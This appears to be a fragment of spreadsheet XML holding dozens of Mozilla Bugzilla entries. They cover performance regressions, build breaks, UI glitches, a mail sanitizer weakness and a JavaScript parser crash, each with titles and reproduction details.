    <t>CORE-477425</t>
  </si>
  <si>
    <t>Tp memory use regression midday on January 27 2009</t>
  </si>
  <si>
    <t>A few days ago I noticed Tp RSS regressions (this is memory usage
during the Tp test) on Linux:
http://graphs.mozilla.org/graph.html#show=3951393951413951709116981431037
There's one jump midday on January 27 (that's the regression this
bug is about) and then another on the early morning of January 30
reported inconsistently between the boxes (that was the talos
unthrottling which increased the memory use number a little not
too surprisingly given time-based caches).
There's a similar memory use regression in the Tp3 (Mem-PB) test
(clearly something to do with memory use although I don't know
what) on Windows XP:
http://graphs.mozilla.org/graph.html#show=3950123950263950529121521431881
at the same time period (it didn't show up on the *-fast machine
though or the trunk07 which also seems different from the rest).
The Mac numbers are *much* noisier than the Windows and Linux 
numbers so it's hard to see if there's a regression there as well.
However on the smoother 10.5 machines (which are better than the
10.4 machines) it looks like there was an equivalent regression on
Mac.</t>
  </si>
  <si>
    <t>CORE-339918</t>
  </si>
  <si>
    <t>needsSecurityCheck() incorrect for top-level scripts</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Load the testcase.
2. Open DOM Inspector.
3. Click the HTML element in the node tree pane.
4. Select JavaScript Object mode in the right pane.
Result: Custom __iterator__ called alert appears and the normal properties of the object aren't listed in DOM Inspector.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-491715</t>
  </si>
  <si>
    <t>[silme] add html format serializer for silme.diff.*</t>
  </si>
  <si>
    <t>Can we add html format serializer for silme.diff.* to Silme so we can present diffs generated from Silme's dummy compare-locales in html format?</t>
  </si>
  <si>
    <t>FIREFOX-84106</t>
  </si>
  <si>
    <t>[FIX]Not correctly retrieving post data when saving a page or frame generated from a form POST</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux 2.4.5-1mdk i586 en-US rv:0.9+)
Gecko/20010604
BuildID:    2001060421
Mozilla does not save the respond to a posted form correctly.
Instead of saving the posted reply it saves the form.
Reproducible: Always
Steps to Reproduce:
1.go to the referenced form
2.type in a URL in the big text box (say http://www.mozilla.org)
3.push dumplinks
4.The form correct displays the page source
5. Now try saving the output
6. You get the form itself and not the response
Actual Results:  You get the form output
Expected Results:  You should get the dumped page.  You do get that in netscape</t>
  </si>
  <si>
    <t>CORE-386281</t>
  </si>
  <si>
    <t>Type Manifest File: spewed to console on launch.</t>
  </si>
  <si>
    <t>CORE-12181</t>
  </si>
  <si>
    <t>Remove static IID decl's from nsPresShell.cpp</t>
  </si>
  <si>
    <t>nsPresShell.cpp has about 20 static IID decls in it. These should be replaced by
using the NS_GET_IID() macro.
I'd do it myself but the reasons are long and complicated. Filing a bug so it is
not forgotten about.</t>
  </si>
  <si>
    <t>CORE-933882</t>
  </si>
  <si>
    <t>Invalidate scripts and discard JIT code instead of doing AutoDebugModeGC</t>
  </si>
  <si>
    <t>We're having a problem in bug 815603 where people who have Firebug enabled are seeing long pauses when switching tabs. Firebug changes the debug mode during tab switch which causes a full AutoDebugModeGC in these cases. These GCs can be ~500ms which is a long time to wait to switch tabs.
Shu thinks we don't need a GC here anymore. Instead we can get away with a CellIter over JSScripts and something to discard JIT code. That should mostly fix the Firebug issue. In the long term switching Firebug to JSD2 should make things even better by allowing us to focus on a single zone. And bug 716647 will allow us to get away without discarding JIT code. But we should do this short-term thing now.</t>
  </si>
  <si>
    <t>TOOLKIT-676419</t>
  </si>
  <si>
    <t>Undeclared variables in storage-mozStorage.js</t>
  </si>
  <si>
    <t>Created attachment 550547
patch
This code is generating warnings about assignments to undeclared variables.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-476790</t>
  </si>
  <si>
    <t>Talkback servers down? Cannot report crashes: Network error Receive failed.</t>
  </si>
  <si>
    <t>Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.21pre) Gecko/20090203 BonEcho/2.0.0.21pre - Build ID: 2009020303
Crashed twice at startup before I succeeded to launch this build. When I try to get a Talkback crash ID by clicking Incidents =&gt; Send Unsent Incident(s) I get an error popup:
Network Error
-------------
Receive Failed.
[ OK ] [ Cancel ]
ifconfig shows that my DSL line is connected I use no proxy or firewall.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-263104</t>
  </si>
  <si>
    <t>Add LXR root for CVS localizations</t>
  </si>
  <si>
    <t>Now that we have localizations in CVS we would like an LXR root for them. I
originally thought to just use the aviarybranch LXR but timeless convinced me
that was a bad idea because it would increase search times and false-positives
for ordinary development work. So I would request lxr.mozilla.org/aviaryl10n
the command to check out this root is
cvs -d :pserver:anonymous@cvs-mirror.mozilla.org:/l10n co -r
AVIARY_1_0_20040515_BRANCH mozilla/</t>
  </si>
  <si>
    <t>THUNDERBIRD-320206</t>
  </si>
  <si>
    <t>bcc field in mailto-URL query string is not unescaped correctly</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Thunderbird 1.6a1 (20051213) and earlier
Fields in the query string of URIs are meant to be %-escaped. So the following mailto-URL works as expected when passed into TB from a browser (both IE and Mozilla):
mailto:a%26b%40c.org?to=c%26d%40e.org (gives a mail addressed to a&amp;b@c.org and c&amp;d@e.org)
Substituting the to by cc in the query string also still works:
mailto:a%26b%40c.org?cc=c%26d%40e.org (gives a mail addressed to a&amp;b@c.org with cc to c&amp;d@e.org)
However using bcc in the query string results in trouble:
mailto:a%26b%40c.org?bcc=c%26d%40e.org
This now gives a mail addressed to a&amp;b@c.org with bcc to c%26d%40e.org
In other words TB forgets to unescape the BCC address(es) correctly. Note that leaving the addresses in the query string unescaped is not an option as the unescaped ampersand would prematurely terminate the to/cc/bcc field.  
Outlook behaves correctly in this respect i.e. treats all the above URIs correctly and on the same footing. 
Reproducible: Always
Steps to Reproduce:
1. Configure TB as default mail application for IE or Mozilla
2. Enter mailto URL mailto:a%26b%40c.org?bcc=c%26d%40e.org into browser address field or click on a link with this URL 
3. Observe addresses shown in TB mail composer window - the BCC addresses will not be unescaped.
Actual Results:  
I get an e-mail compose window with the mail addressed to to a&amp;b@c.org with bcc to c%26d%40e.org
Expected Results:  
I get an e-mail compose window with the mail addressed to to a&amp;b@c.org with bcc to c&amp;d@e.org
This was first discovered in TB 1.0.7 but seems to be the same in the current trunk. Both Mozilla and IE were used as the browsers supplying the mailto-URI to TB. Mozilla in cooperation with Outlook handles the URIs correctly. The problem also occurs when the window.location property is set to the said mailto-URL in JavaScript in the browser. There is no obvious workaround.</t>
  </si>
  <si>
    <t>ulrich</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-390075</t>
  </si>
  <si>
    <t>OS/2 build break in nsMimeInfoOS2.cpp</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.9a7pre) Gecko/2007072922 Minefield/3.0a7pre
Build Identifier: Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.9a7pre) Gecko/2007072922 Minefield/3.0a7pre
After the check-in for bug 385065 where a big part was moved from nsOSHelperAppService.cpp to nsMIMEInfoOS2.cpp the OS/2 build breaks
nsMIMEInfoOS2.cpp
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp: In member 
   function `virtual nsresult nsMIMEInfoOS2::LoadUriInternal(nsIURI*)':
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:159: error: `LOG' 
   undeclared (first use this function)
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:159: error: (Each 
   undeclared identifier is reported only once for each function it appears 
   in.)
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:160: error: `
   nsIPref' undeclared (first use this function)
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:160: error: template
   argument 1 is invalid
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:160: error: `
   NS_PREF_CONTRACTID' undeclared (first use this function)
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:160: error: ISO 
   C++ forbids declaration of `thePrefsService' with no type
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:167: error: `
   kStandardURLCID' undeclared (first use this function)
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:186: error: base 
   operand of `-&gt;' is not a pointer
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:189: error: `
   MAXINIPARAMLENGTH' undeclared (first use this function)
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:193: error: `
   szParamsFromINI' undeclared (first use this function)
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:193: error: `
   GetApplicationAndParametersFromINI' undeclared (first use this function)
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:212: error: `
   NS_UnescapeURL' undeclared (first use this function)
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:245: error: `
   nsIPrefBranch' undeclared (first use this function)
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:245: error: template
   argument 1 is invalid
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:245: error: ISO 
   C++ forbids declaration of `prefBranch' with no type
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:246: error: base 
   operand of `-&gt;' is not a pointer
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:246: error: no 
   matching function for call to `getter_AddRefs(int&amp;)'
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:248: error: base 
   operand of `-&gt;' is not a pointer
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:265: error: base 
   operand of `-&gt;' is not a pointer
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:273: error: base 
   operand of `-&gt;' is not a pointer
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:281: error: base 
   operand of `-&gt;' is not a pointer
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:289: error: base 
   operand of `-&gt;' is not a pointer
E:/usr/src/mozilla/uriloader/exthandler/os2/nsMIMEInfoOS2.cpp:380: error: `
   NO_ERROR' undeclared (first use this function)
make.exe[5]: *** [nsMIMEInfoOS2.o] Error 1
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
Actual Results:  
I was able to add some missing includes but not to resolve everything. However with the patch I'll attach at least Minefield builds.
I guess Peter will find a better solution as he has written the code affected</t>
  </si>
  <si>
    <t>NSS-184557</t>
  </si>
  <si>
    <t>cmsutil: apply usage for signing add option for no encryption cert</t>
  </si>
  <si>
    <t>The cmsutil program (cmd) has an option (-u) to specify the cert usage value 
to apply for verifying certificates.  However the signing case (-S) does not 
use it.  The value specified in -u should apply to signing.
In addition the signing case always attempts to include a certificate that 
could be used to send an encrypted message back to the signing.  In some cases 
this is not required.  cmsutil should include and option (-X) that will 
suppress inclusion of an encryption certificate.</t>
  </si>
  <si>
    <t>thayes0993</t>
  </si>
  <si>
    <t>CORE-524671</t>
  </si>
  <si>
    <t>jsreftests - Crash [@ GetAndCacheLocalTime ]</t>
  </si>
  <si>
    <t>e4x/XMLList/regress-373072.js browser crashes opt/debug on mac tracemonkey at least.</t>
  </si>
  <si>
    <t>BUGZILLA-133862</t>
  </si>
  <si>
    <t>bugzilla index page doesn't focus text field</t>
  </si>
  <si>
    <t>The templatised index page doesn't focus the textfield like the old page did.
Trivial patch coming</t>
  </si>
  <si>
    <t>NSS-485140</t>
  </si>
  <si>
    <t>Wrong command line flags used to build intel-aes.s with Solaris gas for x86_64</t>
  </si>
  <si>
    <t>This happens on the trunk when setting NS_USE_GCC=1 and using gcc 3.4.3 :
gcc -o SunOS5.10_i86pc_gcc_64_OPT.OBJ/SunOS_SINGLE_SHLIB/intel-aes.o  -march=opteron -m64 -fPIC -c intel-aes.s
intel-aes.s: Assembler messages:
intel-aes.s:2: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:3: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:4: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:5: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:5: Error: no such instruction: `you may not use this file except in compliance with'
intel-aes.s:6: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:7: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:8: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:9: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:10: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:11: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:12: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:13: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:14: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:15: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:16: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:17: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:18: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:19: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:20: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:21: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:22: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:23: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:24: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:25: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:26: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:27: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:28: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:29: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:30: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:31: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:40: Error: junk `:buffer for expanded key' after register
intel-aes.s:41: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:77: Error: junk `:buffer for expanded key' after register
intel-aes.s:78: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:148: Error: junk `:output - pointer to output buffer' after register
intel-aes.s:149: Error: junk `:outputLen - pointer to variable for length of output' after register
intel-aes.s:150: Error: junk at end of line first unrecognized character is `('
intel-aes.s:151: Error: junk `:maxOutputLen - length of output buffer' after register
intel-aes.s:152: Error: junk `:input - pointer to input buffer' after register
intel-aes.s:153: Error: junk `:inputLen - length of input buffer' after register
intel-aes.s:154: Error: no such instruction: `on stack:blocksize - AES blocksize (always 16unused)'
intel-aes.s:155: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:256: Error: junk `:output - pointer to output buffer' after register
intel-aes.s:257: Error: junk `:outputLen - pointer to variable for length of output' after register
intel-aes.s:258: Error: junk at end of line first unrecognized character is `('
intel-aes.s:259: Error: junk `:maxOutputLen - length of output buffer' after register
intel-aes.s:260: Error: junk `:input - pointer to input buffer' after register
intel-aes.s:261: Error: junk `:inputLen - length of input buffer' after register
intel-aes.s:262: Error: no such instruction: `on stack:blocksize - AES blocksize (always 16unused)'
intel-aes.s:263: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:363: Error: junk `:output - pointer to output buffer' after register
intel-aes.s:364: Error: junk `:outputLen - pointer to variable for length of output' after register
intel-aes.s:365: Error: junk at end of line first unrecognized character is `('
intel-aes.s:366: Error: junk `:maxOutputLen - length of output buffer' after register
intel-aes.s:367: Error: junk `:input - pointer to input buffer' after register
intel-aes.s:368: Error: junk `:inputLen - length of input buffer' after register
intel-aes.s:369: Error: no such instruction: `on stack:blocksize - AES blocksize (always 16unused)'
intel-aes.s:370: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:424: Error: junk `:output - pointer to output buffer' after register
intel-aes.s:425: Error: junk `:outputLen - pointer to variable for length of output' after register
intel-aes.s:426: Error: junk at end of line first unrecognized character is `('
intel-aes.s:427: Error: junk `:maxOutputLen - length of output buffer' after register
intel-aes.s:428: Error: junk `:input - pointer to input buffer' after register
intel-aes.s:429: Error: junk `:inputLen - length of input buffer' after register
intel-aes.s:430: Error: no such instruction: `on stack:blocksize - AES blocksize (always 16unused)'
intel-aes.s:431: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:548: Error: junk `:buffer for expanded key' after register
intel-aes.s:549: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:582: Error: junk `:buffer for expanded key' after register
intel-aes.s:583: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:672: Error: junk `:output - pointer to output buffer' after register
intel-aes.s:673: Error: junk `:outputLen - pointer to variable for length of output' after register
intel-aes.s:674: Error: junk at end of line first unrecognized character is `('
intel-aes.s:675: Error: junk `:maxOutputLen - length of output buffer' after register
intel-aes.s:676: Error: junk `:input - pointer to input buffer' after register
intel-aes.s:677: Error: junk `:inputLen - length of input buffer' after register
intel-aes.s:678: Error: no such instruction: `on stack:blocksize - AES blocksize (always 16unused)'
intel-aes.s:679: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:784: Error: junk `:output - pointer to output buffer' after register
intel-aes.s:785: Error: junk `:outputLen - pointer to variable for length of output' after register
intel-aes.s:786: Error: junk at end of line first unrecognized character is `('
intel-aes.s:787: Error: junk `:maxOutputLen - length of output buffer' after register
intel-aes.s:788: Error: junk `:input - pointer to input buffer' after register
intel-aes.s:789: Error: junk `:inputLen - length of input buffer' after register
intel-aes.s:790: Error: no such instruction: `on stack:blocksize - AES blocksize (always 16unused)'
intel-aes.s:791: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:895: Error: junk `:output - pointer to output buffer' after register
intel-aes.s:896: Error: junk `:outputLen - pointer to variable for length of output' after register
intel-aes.s:897: Error: junk at end of line first unrecognized character is `('
intel-aes.s:898: Error: junk `:maxOutputLen - length of output buffer' after register
intel-aes.s:899: Error: junk `:input - pointer to input buffer' after register
intel-aes.s:900: Error: junk `:inputLen - length of input buffer' after register
intel-aes.s:901: Error: no such instruction: `on stack:blocksize - AES blocksize (always 16unused)'
intel-aes.s:902: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:960: Error: junk `:output - pointer to output buffer' after register
intel-aes.s:961: Error: junk `:outputLen - pointer to variable for length of output' after register
intel-aes.s:962: Error: junk at end of line first unrecognized character is `('
intel-aes.s:963: Error: junk `:maxOutputLen - length of output buffer' after register
intel-aes.s:964: Error: junk `:input - pointer to input buffer' after register
intel-aes.s:965: Error: junk `:inputLen - length of input buffer' after register
intel-aes.s:966: Error: no such instruction: `on stack:blocksize - AES blocksize (always 16unused)'
intel-aes.s:967: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:1088: Error: junk `:buffer for expanded key' after register
intel-aes.s:1089: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:1121: Error: junk `:buffer for expanded key' after register
intel-aes.s:1122: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:1205: Error: junk `:output - pointer to output buffer' after register
intel-aes.s:1206: Error: junk `:outputLen - pointer to variable for length of output' after register
intel-aes.s:1207: Error: junk at end of line first unrecognized character is `('
intel-aes.s:1208: Error: junk `:maxOutputLen - length of output buffer' after register
intel-aes.s:1209: Error: junk `:input - pointer to input buffer' after register
intel-aes.s:1210: Error: junk `:inputLen - length of input buffer' after register
intel-aes.s:1211: Error: no such instruction: `on stack:blocksize - AES blocksize (always 16unused)'
intel-aes.s:1212: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:1321: Error: junk `:output - pointer to output buffer' after register
intel-aes.s:1322: Error: junk `:outputLen - pointer to variable for length of output' after register
intel-aes.s:1323: Error: junk at end of line first unrecognized character is `('
intel-aes.s:1324: Error: junk `:maxOutputLen - length of output buffer' after register
intel-aes.s:1325: Error: junk `:input - pointer to input buffer' after register
intel-aes.s:1326: Error: junk `:inputLen - length of input buffer' after register
intel-aes.s:1327: Error: no such instruction: `on stack:blocksize - AES blocksize (always 16unused)'
intel-aes.s:1328: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:1436: Error: junk `:output - pointer to output buffer' after register
intel-aes.s:1437: Error: junk `:outputLen - pointer to variable for length of output' after register
intel-aes.s:1438: Error: junk at end of line first unrecognized character is `('
intel-aes.s:1439: Error: junk `:maxOutputLen - length of output buffer' after register
intel-aes.s:1440: Error: junk `:input - pointer to input buffer' after register
intel-aes.s:1441: Error: junk `:inputLen - length of input buffer' after register
intel-aes.s:1442: Error: no such instruction: `on stack:blocksize - AES blocksize (always 16unused)'
intel-aes.s:1443: Error: junk at end of line first unrecognized character is `*'
intel-aes.s:1504: Error: junk `:output - pointer to output buffer' after register
intel-aes.s:1505: Error: junk `:outputLen - pointer to variable for length of output' after register
intel-aes.s:1506: Error: junk at end of line first unrecognized character is `('
intel-aes.s:1507: Error: junk `:maxOutputLen - length of output buffer' after register
intel-aes.s:1508: Error: junk `:input - pointer to input buffer' after register
intel-aes.s:1509: Error: junk `:inputLen - length of input buffer' after register
intel-aes.s:1510: Error: no such instruction: `on stack:blocksize - AES blocksize (always 16unused)'
intel-aes.s:1511: Error: junk at end of line first unrecognized character is `*'
gmake[3]: *** [SunOS5.10_i86pc_gcc_64_OPT.OBJ/SunOS_SINGLE_SHLIB/intel-aes.o] Error 1
gmake[3]: Leaving directory `/h/monstre/export/home/julien/nss/tip/mozilla/security/nss/lib/freebl'
gmake[2]: *** [libs] Error 2
gmake[2]: Leaving directory `/h/monstre/export/home/julien/nss/tip/mozilla/security/nss/lib/freebl'
gmake[1]: *** [libs] Error 2
gmake[1]: Leaving directory `/h/monstre/export/home/julien/nss/tip/mozilla/security/nss/lib'
gmake: *** [libs] Error 2
34.99u 2.70s 0:51.92 72.5%
[jp96085@monstre]/h/monstre/export/home/julien/nss/tip/mozilla/security/nss 125 %
This regression is due to bug 459248 .
We don't normally build with gcc on Solaris but I wanted to do so for checking performance. It was possible on NSS_3_11_BRANCH and it still works there. It is now broken on the trunk and that should be considered a regression.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-243040</t>
  </si>
  <si>
    <t>HTML sanitizer misinterprets attribute values</t>
  </si>
  <si>
    <t>The HTML sanitizer does not properly handle the contents of attribute values. 
This makes it possible to trick it to show remote images despite that I
configured the HTML sanitizer to ignore the src attribute of img elements.
Steps to reproduce:
1. Send the testcase to yourself e.g. by making a manual connection to an SMTP
server with telnet (the HTML sanitizer appears not to work with messages opened
with Thunderbird's File -&gt; Open Saved Message)
2. Choose View -&gt; Message body as -&gt; Original HTML
3. Choose View -&gt; Message body as -&gt; Simple HTML
Actual results:
Some text and an image that was not visible in the Original HTML view is
displayed. The image is loaded from a remote server.
Expected results:
The Simple HTML view should be the same as the original HTML view except that
the alt text of the  should be displayed instead of the image itself. The
alt text should be interpreted as plain text not HTML.
This happens both when the mailnews.display.html_sanitizer.allowed_tags pref is
not set and when the value contains img(alttitlelongdescwidthheight)
(i.e. src is omitted).
I see this using Thunderbird 0.6 on both WinXP and Linux.</t>
  </si>
  <si>
    <t>BUGZILLA-142394</t>
  </si>
  <si>
    <t>Tabular reports should be sortable</t>
  </si>
  <si>
    <t>The bug counts by engineer view should be sortable through clickable headers or
a similar mechanism.</t>
  </si>
  <si>
    <t>CORE-356164</t>
  </si>
  <si>
    <t>Back out bug 355993 fix once bug 348577 is fixed.</t>
  </si>
  <si>
    <t>The hack for bug 355993 should go away once bug 348577 is fixed...</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-311980</t>
  </si>
  <si>
    <t>Speed up _cairo_fixed_from_double</t>
  </si>
  <si>
    <t>Cairo's current implementation of gradients makes heavy use of
_cairo_fixed_from_double which vc6's compiler can't seem to do a good job of
optimizing.  Using a neat trick to speed it up improved our gradient performance
tests by about 25% on windows.</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-388207</t>
  </si>
  <si>
    <t>Remove the bogus and never-(properly-)shown it's our fault :-( feed preview error</t>
  </si>
  <si>
    <t>Back when I first noticed that although bug 346312 removed the way that the error.message entity (There was an error processing this feed. It's our fault. :-( You can still subscribe to the feed if you know what it is. For reference the error was:) was shown it didn't remove the entity or its inclusion in the page I thought that was only a problem in that as http://mxr.mozilla.org/l10n-mozilla1.8/search?string=error.message shows we made a whole lot of localizers translate a string with a frownie even though it wouldn't ever be seen. But as he is wont to do timeless noticed that you can actually see it quite easily in feeds where there was absolutely no error.
STR:
1. Load http://www.mozilla.org/news.html
2. In the View menu select Page Style -&gt; No Style
3. Click the feed icon in the address bar</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-461012</t>
  </si>
  <si>
    <t>Try-talos missed perf regression in patch which mozilla-central-talos did catch</t>
  </si>
  <si>
    <t>In bug#449443 sdwilsh submitted a patch to try-talos and the results looked fine. However when he landed the same patch on mozilla-central the mozilla-central-talos results showed a perf regression. 
Its hard to recreate this problem but what can we do on try-talos to catch this kinda problem in future? 
Filing this bug to track this as irc/email is too easy to lose...</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-343823</t>
  </si>
  <si>
    <t>update bonsai and rebuild history for 2006-07-06</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-422991</t>
  </si>
  <si>
    <t>'make distclean' misses some files</t>
  </si>
  <si>
    <t>Created attachment 309498
cleanup round 1
As a follow-up of bug 333308 here are even more cleanups for:
browser/installer/packages-static
browser/installer/removed-files
other-licenses/branding/firefox/locales/Makefile
other-licenses/branding/firefox/Makefile</t>
  </si>
  <si>
    <t>NSS-353763</t>
  </si>
  <si>
    <t>klocwork Null ptr dereferences in pk11cert.c</t>
  </si>
  <si>
    <t xml:space="preserve">All these klocwork IDs are in 
File nss/lib/pk11wrap/pk11cert.c
Klocwork ID 88363
Function PK11_FindCertsFromNickname
Pointer 'certList' returned from call to function 'CERT_NewCertList' at 
line 739 may be NULL and may be dereferenced by passing argument 1 to 
function 'CERT_AddCertToListSorted' at line 745.
741	    CERTCertificate *certCert = STAN_GetCERTCertificateOrRelease(c) 
742	    /* c may be invalid after this don't reference it */ 
743	    if (certCert) { 
744	        /* CERT_AddCertToListSorted adopts certCert  */ 
745		CERT_AddCertToListSorted(certList certCert 
746			             CERT_SortCBValidity </t>
  </si>
  <si>
    <t>CORE-278353</t>
  </si>
  <si>
    <t>Position:fixed breaks for xhtml file</t>
  </si>
  <si>
    <t>To reproduce:
Load URL or xhtml page in test case into reduced size browser window.
Note menu using style position:fixed in top right hand corner.
Scroll down - menu disappears - it should remain fixed to viewport.
Move mouse over area where menu was - :hovers are still active.
Scroll up - menu splatters over scrolled area.
Now load html test case - page behaves correctly.
This bug seems dependent on the mime type for served pages  - the mime header
for the quoted url is:
Content-Type: application/xhtml+xml charset=ISO-8859-15
wheras a very similar menu on the page:
http://www.w3.org/Style/Examples/007/menus.html
served as:
Content-Type: text/html charset=iso-8859-1
behaves normally.
For local pages the bug seems dependent on the file extension - the bug is seen
on pages with the extension xhtml but the same page (which in the test case is a
valid xhtml1.1 document) with the extension html is rendered correctly.
This bug is not seen with Mozilla 1.7.5 or derivatives such as Firefox.
It is seen under 1.8a5 with and without the bug 268111 patch.
With later builds (either a6 or the latest nightly - I'll confirm later)
the bug is still present when the page loads but changing the window size fixes
it temporarily.</t>
  </si>
  <si>
    <t>peter.harlow</t>
  </si>
  <si>
    <t>THUNDERBIRD-312016</t>
  </si>
  <si>
    <t>Download More Dictionaries link outline is drawn over its whole line</t>
  </si>
  <si>
    <t>The Download More Dictionaries link outline is drawn over its whole line
screenshot coming.</t>
  </si>
  <si>
    <t>PANCAKE_GRAVEYARD-663102</t>
  </si>
  <si>
    <t>Front-end</t>
  </si>
  <si>
    <t>Display search engines if 2 or less search results are returned</t>
  </si>
  <si>
    <t>Let's add our search engines to the end of our search results if there are 0 1 or 2 results displayed. 
Sample mockup where no results are returned: http://www.cl.ly/3d2t0r1Z200A2p2P1S1B</t>
  </si>
  <si>
    <t>ibarlow</t>
  </si>
  <si>
    <t>CORE-496682</t>
  </si>
  <si>
    <t>Crash [@ FindPropertyValue] or Assertion failure: right-&gt;pn_arity != PN_LIST || !(right-&gt;pn_xflags &amp; PNX_DESTRUCT) at ../jsparse.cpp</t>
  </si>
  <si>
    <t>const{0:[]}=
crashes both opt and debug js shell on TM without -j at FindPropertyValue.
Probably because pn in pn-&gt;pn_type is null so it's probably a null-dereference.
js&gt; const{0:[]}=
Program received signal EXC_BAD_ACCESS Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000000
0x000daab6 in FindPropertyValue (pn=0x0 pnid=0x811b20 data=0xbffff2bc) at ../jsparse.cpp:3560
3560        if (pn-&gt;pn_type != TOK_RC)
(gdb) bt
#0  0x000daab6 in FindPropertyValue (pn=0x0 pnid=0x811b20 data=0xbffff2bc) at ../jsparse.cpp:3560
#1  0x000db748 in UndominateInitializers (left=0x811af0 right=0x0) at ../jsparse.cpp:3844
#2  0x000ea947 in Variables (cx=0x30bc40 ts=0xbffff60c tc=0xbffff548 inLetHead=false) at ../jsparse.cpp:5591
#3  0x000e5ab3 in Statement (cx=0x30bc40 ts=0xbffff60c tc=0xbffff548) at ../jsparse.cpp:5222
#4  0x000e6832 in Statements (cx=0x30bc40 ts=0xbffff60c tc=0xbffff548) at ../jsparse.cpp:2903
#5  0x000ec565 in JSCompiler::parse (this=0xbffff5ec chain=0x2c0000) at ../jsparse.cpp:740
#6  0x00024547 in JS_BufferIsCompilableUnit (cx=0x30bc40 obj=0x2c0000 bytes=0x30d390 const{0:[]}= length=12) at ../jsapi.cpp:4742
